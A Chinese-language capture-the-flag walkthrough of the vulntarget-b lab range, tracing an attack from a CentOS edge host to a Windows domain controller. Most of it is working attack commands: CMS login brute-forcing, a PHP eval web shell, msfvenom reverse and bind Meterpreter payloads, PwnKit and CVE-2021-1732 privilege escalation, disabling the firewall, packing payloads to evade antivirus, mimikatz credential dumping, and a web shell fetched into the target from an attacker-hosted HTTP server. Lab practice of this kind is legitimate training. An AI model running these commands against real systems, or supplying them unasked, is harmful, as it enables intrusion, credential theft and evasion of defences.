vulntarget-b
环境搭建
下载地址:
百度云:
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p
靶机相关信息:
kali攻击机
ip:192.168.12.144
边界主机Centos 7
ip:192.168.12.6
域内主机win10
ip:10.0.20.66
域控主机
ip:10.10.0.100
外网主机网络配置
1.登录CentOS 7主机,root/root
2.编辑修改
vi /etc/sysconfig/network-scripts/ifcfg-ens33
修改内容为(将ip修改为自己的子网段,能够与攻击机进行联网):
IPADDR=192.168.12.6 //修改
NETMASK=255.255.255.0 //修改
GATEWAY=192.168.12.12 //修改
3.重启网卡配置
systemctl restart network
一、信息收集
1.主机发现,发现目标靶机ip:192.168.12.6
arp-scan -l
2.对靶机ip进行端口扫描,发现主机开放21、22、80、81、888、3306以及8888端口
nmap -sT -Pn 192.168.12.6 -p-
3.对扫描出来的端口进行访问,80端口是宝塔默认页面/81端口是极致CMS站点/8888端口是宝塔登录页面入口,先从极致CMS页面81端口入手
二、漏洞挖掘
1.对81端口的站点进行目录扫描
dirb http://192.168.12.6:81/
扫描的信息
http://192.168.12.8:81/admin.php/Login/index.html #后台登录
http://192.168.12.8:81/index.php #首页
http://192.168.12.8:81/robots.txt #敏感目录
http://192.168.12.8:81/readme.txt #版本信息
三、漏洞利用
1.根据上面收集极致CMS Beta1.8.1存在后台getshell的漏洞,首先要利用bp进行后台登录用户和密码的爆破。admin/admin123
2.开始后台GetShell,点击扩展管理–>插件列表–>找到在线编辑模板–>下载–>安装–>配置–>输入账户密码–>点击立即提交–>跳转到在线文件管理工具–>登录即可-----》失败,没有加载出插件来
3.在文件管理器中创建木马文件,写入一句话并用蚁剑连接
浏览器访问验证
4.进入蚁剑shell执行命令返回ret=127,可能是宝塔禁用了命令执行函数,这里使用蚁剑的插件进行绕过命令,但是还是存在一些命令不能执行
5.进行简要的信息收集
id
whoami
uname -a
/sbin/ifconfig
cat /etc/passwd
收集到的信息
低权限用户:www
可用用户:root/vulntarget
网卡信息:192.168.12.6/10.0.20.30
6.利用MSF生成木马后门,通过蚁剑上传并执行,kali开启监听等待反弹shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.12.144 LPORT=8989 -f elf -o shell.elf
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.12.144
set lport 8989
show options
run
四、提权
1.直接使用模块查找可提权的漏洞,直接使用cve_2021_4034_pwnkit_lpe_pkexec进行提权
run post/multi/recon/local_exploit_suggester
2.执行下面的命令进行提权
bg
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session 1
run
3.进入/root下获得flag
vulntarget{get-one-centos-privilage-promotion}
域内主机
一、信息收集
1.利用MSF添加路由
run post/multi/manage/autoroute #添加路由
run autoroute -p #查看路由
2.使用MSF的PortScan模块对内网进行主机存活及端口开放扫描…发现内网10.0.20.66开放8080端口
use auxiliary/scanner/portscan/tcp
set rhost 10.0.20.0/24
set ports 21,22,80,135,139,445,8080
set threads 30
run
3.上传fscan到蚁剑,发现10.0.20.66主机为存活且开放3306/8080端口
#项目地址
https://github.com/shadow1ng/fscan
#执行命令
./fscan_amd64 -h 10.0.20.0/24 -np #-np 禁ping扫描
4.使用chisel进行流量代理的搭建,这里搭建反向流量代理,使用浏览器测试访问内网站点
#项目地址
https://github.com/jpillora/chisel
#Kali执行命令
./chisel server -p 50050 --reverse
#边界主机执行命令
./chisel client 192.168.50.46:50050 R:socks
#代理配置
127.0.0.1 1080 socks5
二、内网攻击
1.访问以下地址可获取该CMS的版本,在网络上搜索该版本禅道CMS系统的漏洞,发现存在CNVD-C-2020-121325漏洞,直接复现!!!
http://10.0.20.66:8080/index.php?mode=getconfig
2.先尝试弱口令登录,尝试几次后处罚防护机制故取出使用BP爆破的思路,尝试在边界主机上爆破的账号密码admin:Admin123即可登录成功
3.在边界主机上写入一句话木马并开启HTTP服务器对内网主机提供下载,对提供出来一句话木马下载地址进行base64编码
#将木马写入到第一层的centos机器中
echo "<?php @eval(\$_POST['cmd']); ?> " >1.php #$前加一个反斜杠转义
#开启python的http服务
python -c 'import pty; pty.spawn("/bin/bash")' //交互式
python -m SimpleHTTPServer 4545
#base64编码
HTTP://10.0.20.30:4545/1.php
加密后:SFRUUDovLzEwLjAuMjAuMzA6NDU0NS8xLnBocA==
4.GetShell,将以上步骤得到base64编码值放到link参数后面下载后门文件,访问特定地址即可获取到Shell地址,然后使用蚁剑链接访问
#漏洞利用
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6NDU0NS8xLnBocA==
#Shell地址
http://10.0.20.66:8080/data/client/1/1.php
因为前面的代理本机不能进行连接,我尝试利用MSF开启代理
use auxiliary/server/socks_proxy
set rveport 1088
run
5.执行下面的命令,进行信息收集
#whoami /priv
iis apppool\zentao
#system
OS:Windows 10 18363 专业版
#ipconfig
NIC1:10.0.20.66
NIC2:10.0.10.99
#systeminfo
#net time /domain
域:vulntarget.com
域控IP:10.0.10.100
#tasklist /svc
火绒/windows defender
#查看防火墙状态
netsh advfirewall show allprofile state
#关闭防火墙
netsh advfirewall set allprofile state off
6.通过执行上面的命令收集而来的信息,发现其是域内的低权限主机,在MSF上生成正向木马加壳免杀后通过蚁剑上传运行,注意需要将靶机上的防火墙关闭后才能反弹shell成功
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=7878 -f exe > inside.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 7878
set Rhost 10.0.20.66
run
加壳免杀:http://www.ucbug.com/soft/33605.html
三、内网提权
1.在MSF中使用以下模块搜索漏洞利用模块进行提权,未果在公网上搜索相关提权漏洞
run post/multi/recon/local_exploit_suggester
2.在公网找到CVE-2021-1732针对于Windows 10的提权漏洞,Github上寻找并在下载放置到蚁剑中执行测试,这里同样需要加壳绕过火绒
#提权项目
源项目地址:https://github.com/shanfenglan/test/blob/master/cve-2021-1732.exe
备份地址:https://github.com/sukusec301/test/blob/master/cve-2021-1732.exe
#使用方式
cve-2021-1732.exe whoami
windows/local/cve_2020_0796_smbghost
3.使用MSF生成正向连接马,进行加壳免杀后通过蚁剑上传执行反弹shell,成功获得system权限的shell
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8181 -f exe > insystem.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8181
set rhost 10.0.20.66
run
4.尝试抓取密码,只抓取到了域成员是win101账户的NTLM Hash解密得到密码admin#123;添加路由信息
#抓取密码
load kiwi
kiwi_cmd sekurlsa::logonpasswords
#添加路由
run post/multi/manage/autoroute //添加路由
run autoroute -p //查看路由
域控服务
一、信息收集
1.使用scaninfo扫描内部存活主机,发现存活主机10.0.10.100且扫描出主机账号密码信息
项目地址:https://github.com/redtoolskobe/scaninfo
#使用方法
scaninfo_windows_x64.exe -i 10.0.10.0/24
#使用方法
scaninfo_windows_x64.exe -i 10.0.10.0/24
失败,文件太大上传失败,而且导致session die,连接中断
2.还是采用MSF的Portscan模块对目标进行端口扫描
use auxiliary/scanner/portscan/tcp
set rhost 10.0.10.100
set ports 21,22,80,135,139,445,8080
set threads 20
run
3.编辑本地Host文件修改域名信息并下载漏洞攻击项目到本地,使用Python脚本并按照以下格式攻击即可获取到域控的Shell
#vi /etc/hosts
10.0.10.100 vulntarget.com
#漏洞项目下载
https://github.com/WazeHell/sam-the-admin
#漏洞攻击使用
proxychains python3 sam_the_admin.py "域名/域用户:用户密码" -dc-ip 域控IP -shell
proxychains python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell